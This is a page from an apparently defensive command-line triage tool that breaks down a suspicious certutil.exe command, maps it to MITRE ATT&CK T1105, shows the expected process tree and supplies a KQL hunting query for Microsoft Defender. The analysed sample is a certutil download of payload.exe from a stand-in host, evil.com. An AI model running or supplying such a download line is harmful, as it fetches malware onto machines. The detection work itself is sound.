Interactive Command Triage Engine
Command Line Decoder & Telemetry Studio
Paste suspicious command line strings from alerts, EDR logs, or sandbox execution to extract threat behaviors and generate SIEM rules.
Local Engine • Private & Secure
Quick Samples:
Raw Command Line Input
Client-side parsing • Zero network telemetry
Critical RiskWindowsDownload
Threat Assessment & MITRE Mapping
Identified abuse of trusted binary **certutil.exe** (WINDOWS). Pattern indicates **Download** activity mapped to MITRE ATT&CK technique **T1105: Ingress Tool Transfer**.
MITRE Technique:T1105 • Ingress Tool Transfer (Command and Control)
Command Obfuscation Detected
- Environment variable path concatenation (e.g. %TEMP%)
- External network URL resource reference detected
Parameter & Switch Breakdown
| Switch / Token | Identified Purpose | Status |
|---|---|---|
-urlcache | Enable URL Cache parsing | Suspicious |
-split | Split / Force File Download | Suspicious |
-fhttp://evil.com/payload.exe | Force Overwrite | Standard |
Process Lineage & Execution TreeExpected Parent → Spawned Sub-process
1
cmd.exeparent process
Medium Integrity
C:\Windows\System32\cmd.exe
Spawning shell interpreter or automated task scheduler.
2
certutil.exetarget process
Medium Integrity
C:\Windows\System32\certutil.exe
The target command line executing suspicious flags.
3
payload.exechild process
Medium Integrity
C:\Users\Public\payload.exe
Downloaded secondary payload staged on disk.
Detection Engineering & SIEM Rules
Copy-paste ready telemetry filtersMicrosoft Defender Advanced Hunting • DeviceProcessEvents schemaLive query
Microsoft Defender XDR / Sentinelkql
1// Microsoft Defender XDR / Microsoft Sentinel2// Tactic: Download3DeviceProcessEvents4| where FileName =~ "certutil.exe"5| where ProcessCommandLine has_any ("-urlcache", "-split", "-f")6| project7 Timestamp,8 DeviceName,9 AccountName,10 InitiatingProcessParentFileName,11 InitiatingProcessFileName,12 InitiatingProcessCommandLine,13 FileName,14 FolderPath,15 ProcessCommandLine,16 MD5,17 SHA25618| sort by Timestamp desc